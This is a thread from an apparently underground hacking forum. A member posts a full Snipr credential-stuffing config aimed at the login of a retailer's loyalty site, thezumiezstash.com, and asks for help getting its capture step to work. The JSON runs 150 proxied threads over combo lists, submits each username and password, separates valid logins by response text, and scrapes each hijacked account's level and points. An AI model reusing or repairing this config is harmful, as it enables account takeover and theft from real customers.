Be A Boss - School a noob - Help the team.

Step Into The Dark

The shadows are waiting. Register now to unlock restricted discussions, share hidden secrets, and whisper in the dark with our elite circle.

Join The Underground

suffocate

Member
Joined
Apr 7, 2018
Messages
392
Could anyone give me a hint as to why capture is not working for this config I made?  The one pushed out from snipr server does not have capture and is not as fast.
Any tips appreciated.
Thanks!


[hide]
{
  "General": {
    "proxyType": "Proxies",
    "comboType": "Email/Username",
    "threads": "150",
    "name": "Zcash2"
  },
  "Requests": [
    {
      "successKeys": [
        "Community"
      ],
      "actionUrl": "https://thezumiezstash.com/login",
      "method": "GET",
      "userAgent": "Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36 OPR\\/49.0.2725.47",
      "contentType": "application/x-www-form-urlencoded",
      "accept": "*/*",
      "referer": "https://thezumiezstash.com/login",
      "cookies": "__cfduid=d372399219c8c516f1d99e506db39a11a1522119692",
      "postData": "username_login=<USER>&password_login=<PASS>&op=Login&form_build_id=form-+id+&form_id=crowdtwist_login_form",
      "headers": [
        {
          "name": "X-Content-Type-Options:",
          "value": "nosniff"
        },
        {
          "name": "X-Generator: Drupal 8 (https://www.drupal.org)",
          "value": "Drupal 8 (https://www.drupal.org)"
        }
      ],
      "failureKeys": [
        "The login information was incorrect. Please try again."
      ],
      "variables": [
        {
          "type": "Regex",
          "name": "id",
          "usedFor": "postData"
        }
      ]
    },
    {
      "method": "POST",
      "actionUrl": "https://thezumiezstash.com/login",
      "userAgent": "Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36 OPR\\/49.0.2725.47",
      "contentType": "application/x-www-form-urlencoded",
      "accept": "*/*",
      "referer": "https://thezumiezstash.com/login",
      "cookies": "__cfduid=d372399219c8c516f1d99e506db39a11a1522119692",
      "postData": "username_login=<USER>&password_login=<PASS>&op=Login&form_build_id=form-+id+&form_id=crowdtwist_login_form",
      "successKeys": [
        "Community"
      ],
      "failureKeys": [
        "The login information was incorrect. Please try again."
      ],
      "headers": [
        {
          "name": "X-Content-Type-Options:",
          "value": "nosniff"
        },
        {
          "name": "X-Generator: Drupal 8 (https://www.drupal.org)",
          "value": "Drupal 8 (https://www.drupal.org)"
        }
      ],
      "captureParse": {
        "patterns": [
          {
            "pattern": "Your Level: <span>([^<]*)",
            "returnString": "Level: +1+"
          },
          {
            "pattern": "<div class='num orange'>([^<]*)",
            "returnString": "Points: +1+"
          }
        ]
      }
    }
  ]
}

[/hide]
 
suffocate said:
Could anyone give me a hint as to why capture is not working for this config I made?  The one pushed out from snipr server does not have capture and is not as fast.
Any tips appreciated.
Thanks!
 
Back
Top